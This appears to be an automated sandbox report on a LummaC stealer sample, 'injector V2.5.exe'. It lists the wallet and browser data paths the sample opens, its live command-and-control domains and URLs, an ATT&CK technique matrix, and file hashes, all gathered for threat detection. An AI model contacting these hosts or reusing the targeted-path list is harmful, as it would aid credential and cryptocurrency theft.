              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\ZTGJILHXQBJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1849649478.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 4928, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 4928, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              11
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol31
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager131
              Security Software Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
              Obfuscated Files or Information
              NTDS11
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials11
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              injector V2.5.exe34%ReversingLabsWin32.Trojan.Stealerc
              injector V2.5.exe100%AviraHEUR/AGEN.1361736
              injector V2.5.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://librari-night.sbs/apir100%Avira URL Cloudmalware
              https://librari-night.sbs/t?100%Avira URL Cloudmalware
              https://librari-night.sbs/api~100%Avira URL Cloudmalware
              https://librari-night.sbs/OT100%Avira URL Cloudmalware
              https://revirepart.biz/api100%Avira URL Cloudmalware
              https://librari-night.sbs/r100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              librari-night.sbs
              172.67.206.172
              truefalse
                high
                revirepart.biz
                104.21.43.198
                truefalse
                  high
                  processhol.sbs
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://librari-night.sbs/apifalse
                      high
                      p3ar11fter.sbsfalse
                        high
                        peepburry828.sbsfalse
                          high
                          https://revirepart.biz/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          revirepart.bizfalse
                            high
                            p10tgrace.sbsfalse
                              high
                              processhol.sbsfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabinjector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://librari-night.sbs/api~injector V2.5.exe, 00000002.00000003.1902012825.00000000033E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://duckduckgo.com/ac/?q=injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://sectigo.com/CPS0injector V2.5.exefalse
                                      high
                                      http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#injector V2.5.exefalse
                                        high
                                        https://librari-night.sbs/injector V2.5.exe, 00000002.00000002.1930206544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1924998682.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1924998682.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799048884.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1925547199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902129361.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1872564200.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1930155911.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902620677.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799241711.0000000005AEC000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799418781.0000000005AED000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1926539223.00000000033DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoinjector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0injector V2.5.exefalse
                                              high
                                              http://ocsp.sectigo.com0injector V2.5.exefalse
                                                high
                                                https://librari-night.sbs:443/apiinjector V2.5.exe, 00000002.00000003.1923653498.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902597448.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1902012825.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000337E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#injector V2.5.exefalse
                                                    high
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://librari-night.sbs/t?injector V2.5.exe, 00000002.00000003.1902620677.00000000033D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://ocsp.rootca1.amazontrust.com0:injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016injector V2.5.exe, 00000002.00000003.1799004611.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799257320.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1798838778.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776917061.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1777081480.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#injector V2.5.exefalse
                                                                high
                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17injector V2.5.exe, 00000002.00000003.1799004611.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1799257320.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1798838778.0000000005B37000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776917061.0000000005B83000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1777081480.0000000005B37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brinjector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://librari-night.sbs/apirinjector V2.5.exe, 00000002.00000003.1923653498.000000000337E000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1929912011.000000000337E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://ac.ecosia.org/autocomplete?q=injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0injector V2.5.exefalse
                                                                          high
                                                                          https://librari-night.sbs/rinjector V2.5.exe, 00000002.00000003.1798953231.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776244127.00000000033EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: malware
                                                                          unknown
                                                                          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yinjector V2.5.exefalse
                                                                            high
                                                                            http://x1.c.lencr.org/0injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://x1.i.lencr.org/0injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zinjector V2.5.exefalse
                                                                                  high
                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installinjector V2.5.exe, 00000002.00000003.1777081480.0000000005B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchinjector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.microsofinjector V2.5.exe, 00000002.00000003.1776917061.0000000005B85000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?injector V2.5.exe, 00000002.00000003.1821148663.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesinjector V2.5.exe, 00000002.00000003.1777081480.0000000005B12000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.mozilla.org/products/firefoxgro.allinjector V2.5.exe, 00000002.00000003.1822505611.0000000005C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://librari-night.sbs/OTinjector V2.5.exe, 00000002.00000003.1799214621.00000000033D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              unknown
                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=injector V2.5.exe, 00000002.00000003.1776561248.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1776480308.0000000005B2B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#injector V2.5.exefalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  172.67.206.172
                                                                                                  librari-night.sbsUnited States
                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                  104.21.43.198
                                                                                                  revirepart.bizUnited States
                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                  Analysis ID:1560308
                                                                                                  Start date and time:2024-11-21 16:52:06 +01:00
                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                  Overall analysis duration:0h 4m 7s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                  Number of analysed new started processes analysed:6
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Sample name:injector V2.5.exe
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/0@3/2
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 62%
                                                                                                  • Number of executed functions: 28
                                                                                                  • Number of non-executed functions: 93
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  • Stop behavior analysis, all processes terminated
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                  • VT rate limit hit for: injector V2.5.exe
                                                                                                  TimeTypeDescription
                                                                                                  10:53:01API Interceptor9x Sleep call for process: injector V2.5.exe modified
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  172.67.206.172file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                  Unpacker.exeGet hashmaliciousLummaCBrowse
                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                      104.21.43.198gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          revirepart.bizhmjsOnyfSB.dllGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.184.174
                                                                                                                          modest-menu.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.184.174
                                                                                                                          gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.43.198
                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.43.198
                                                                                                                          c2_Acid.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.184.174
                                                                                                                          XRuncher_2.5.0.6.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.184.174
                                                                                                                          Jorieh.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.184.174
                                                                                                                          librari-night.sbsDocumento.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.85.146
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                          • 104.21.85.146
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.85.146
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          hmjsOnyfSB.dllGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.85.146
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.66.38
                                                                                                                          payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 172.67.209.48
                                                                                                                          Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 104.21.41.74
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                          • 162.159.61.3
                                                                                                                          http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.6.188
                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.66.38
                                                                                                                          VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.198.61
                                                                                                                          Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                          • 104.21.15.40
                                                                                                                          https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.86.42
                                                                                                                          ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.155.248
                                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.66.38
                                                                                                                          payments.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 172.67.209.48
                                                                                                                          Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 104.21.41.74
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                          • 162.159.61.3
                                                                                                                          http://xmrminingproxy.comGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.21.6.188
                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 104.21.66.38
                                                                                                                          VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.198.61
                                                                                                                          Director of Performance Marketing Job Description Roles & Responsibilities Theory 2024.lnkGet hashmaliciousDucktailBrowse
                                                                                                                          • 104.21.15.40
                                                                                                                          https://spacardportal.works.com/garGet hashmaliciousUnknownBrowse
                                                                                                                          • 104.18.86.42
                                                                                                                          ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.155.248
                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          VMX.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          ADZ Laucher.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          Hexium.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          BlazeVaze.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          ExL4unch#U20ac#U00ae.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.206.172
                                                                                                                          • 104.21.43.198
                                                                                                                          No context
                                                                                                                          No created / dropped files found
                                                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.69373304289523
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:injector V2.5.exe
                                                                                                                          File size:587'904 bytes
                                                                                                                          MD5:96f89e1cb2a8789acee8720d872b4cc5
                                                                                                                          SHA1:03e6c31a56329ac737de81a43c9b8b9266fd31a3
                                                                                                                          SHA256:313d44650a5c5c542bbbcae9d17c03cc0981642b1450a092bfa95956bbead114
                                                                                                                          SHA512:8aacc3f740abf77e70ebbcfcbf29c010eb4d9f7e43f68f3841102c248fb89c0a433916927be7a471e280037ec3058ab02a2b48e2c6312782a9cb74dc0ab2fcee
                                                                                                                          SSDEEP:12288:SRgyqSwAN2kLkjnP13tGHaSQ3fTPTzLXwlIfykWetYbVYN5BUPx3ABtCT7lr7v:ig2N2kLkTd3AHah3f7DyJqYGBUPx3AuJ
                                                                                                                          TLSH:BDC4D0165141F8A3F88758FF38A2A31724E733B2A7B1CDE3C175756887801C1D5EAA6E
                                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....2?g.................V........................@.......................................@.................................T...(..
                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                          Entrypoint:0x4292c0
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows cui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x673F321B [Thu Nov 21 13:14:03 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:6
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:6
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:6
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:3a33a82bcd5969a5b19ce5fba049e5b4
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 30/08/2023 20:00:00 30/08/2026 19:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN=Privacy Technologies OU, O=Privacy Technologies OU, S=Harjumaa, C=EE
